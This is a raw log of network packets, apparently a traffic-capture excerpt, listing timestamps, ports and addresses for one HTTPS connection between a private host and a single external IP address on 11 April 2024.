Apr 11, 2024 11:32:56.390568972 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.391828060 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.391851902 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.391900063 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.391911030 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.391940117 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.391968966 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.392877102 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.392899990 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.392959118 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.392971039 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.392996073 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.393019915 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.394664049 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.394690037 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.394743919 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.394753933 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.394793034 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.394809961 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.396374941 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.396405935 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.396461964 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.396472931 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.396506071 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.396543980 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.397669077 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.397695065 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.397784948 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.397803068 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.397999048 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.398847103 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.398869038 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.398921013 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.398931026 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.398963928 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.398981094 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.400542974 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.400567055 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.400643110 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.400660038 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.400691986 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.400721073 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.402478933 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.402498007 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.402568102 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.402580023 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.402637005 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.403320074 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.403343916 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.403388977 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.403398991 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.403426886 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.403444052 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.405180931 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.405206919 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.405261040 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.405272007 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.405302048 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.405328035 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.406729937 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.406758070 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.406806946 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.406816959 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.406856060 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.406877041 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.408379078 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.408405066 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.408452034 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.408462048 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.408503056 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.408520937 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.409548998 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.409573078 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.409627914 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.409638882 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.409678936 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.409698009 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.411187887 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.411211967 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.411288977 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.411299944 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.411338091 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.411367893 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.412203074 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.412231922 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.412290096 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.412301064 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.412348986 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.412367105 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.414339066 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.414366007 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.414438963 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.414450884 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.414484024 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.414505959 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.415319920 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.415344954 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.415400982 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.415411949 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.415442944 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.415474892 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.417191029 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.417216063 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.417292118 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.417303085 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.417330027 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.417361021 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.418803930 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.418837070 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.418884993 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.418895006 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.418934107 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.418953896 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.419825077 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.419851065 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.419898033 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.419909000 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.419946909 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.419965982 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.420897007 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.420922995 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.420974970 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.420985937 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.421019077 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.421039104 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.422694921 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.422719002 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.422796965 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.422807932 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.423093081 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.423785925 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.423810005 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.423866034 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.423876047 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.423908949 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.423928976 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.425643921 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.425664902 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.425736904 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.425748110 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.425801039 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.426831007 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.426851988 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.426915884 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.426927090 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.426959038 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.426980019 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.428548098 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.428581953 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.428668022 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.428678036 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.428720951 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.428742886 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.429687977 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.429716110 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.429785013 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.429799080 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.429841995 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.429860115 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.431158066 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.431178093 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.431260109 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.431272984 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.431325912 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.432296038 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.432315111 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.432375908 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.432387114 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.432416916 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.432549953 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.433134079 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.433151960 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.433209896 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.433222055 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.433276892 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.437376976 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.437395096 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.437463045 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.437474012 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.437513113 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.437530041 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.437777996 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.437794924 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.437856913 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.437869072 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.437927961 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.438114882 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.438133001 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.438199997 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.438211918 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.438270092 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.438884020 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.438910007 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.438976049 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.438987017 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.439013958 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.439042091 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.439949036 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.439970970 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.440021992 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.440033913 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.440062046 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.440078974 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.440912962 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.440974951 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.441001892 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.441015005 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.441044092 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.441062927 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.442306995 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.442352057 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.442388058 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.442401886 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.442429066 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.442449093 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.443314075 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.443356991 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.443399906 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.443411112 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.443439960 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.443464041 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.444345951 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.444392920 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.444447041 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.444459915 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.444488049 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.444516897 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.445818901 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.445862055 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.445898056 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.445909023 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.445941925 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.445961952 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.446738958 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.446759939 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.446819067 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.446830034 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.446865082 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.446890116 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.447897911 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.447920084 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.447988987 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.447999954 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.448040009 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.448057890 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.448699951 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.448720932 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.448792934 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.448805094 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.448853016 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.448853016 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.450334072 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.450352907 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.450439930 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.450453043 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.450514078 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.464879036 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.464924097 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.464984894 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.464996099 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.465038061 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.465055943 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.465980053 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.466021061 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.466173887 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.466173887 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.466238022 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.466306925 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.466907978 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.466952085 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.466996908 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.467011929 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.467046976 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.467068911 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.468265057 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.468307018 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.468353033 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.468364954 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.468396902 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.468427896 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.469670057 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.469727993 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.469806910 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.469819069 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.469846964 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.469886065 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.470330000 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.470372915 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.470407963 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.470419884 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.470454931 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.470473051 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.471301079 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.471343994 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.471384048 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.471396923 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.471426964 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.471445084 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.472644091 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.472687006 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.472738981 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.472749949 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.472784042 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.472820044 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.473273039 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.473315001 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.473355055 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.473366976 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.473395109 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.473419905 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.473962069 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.474533081 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.474576950 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.474617958 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.474630117 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.474661112 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.474684000 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.475672960 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.475716114 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.475764990 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.475775957 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.475812912 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.475833893 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.476207972 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.476298094 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.477014065 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.477062941 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.477103949 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.477114916 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.477144003 CEST	49730	443	192.168.2.5	162.159.134.233
Apr 11, 2024 11:32:56.477937937 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.477962017 CEST	443	49730	162.159.134.233	192.168.2.5
Apr 11, 2024 11:32:56.478015900 CEST	49730	443	192.168.2.5	162.159.134.233
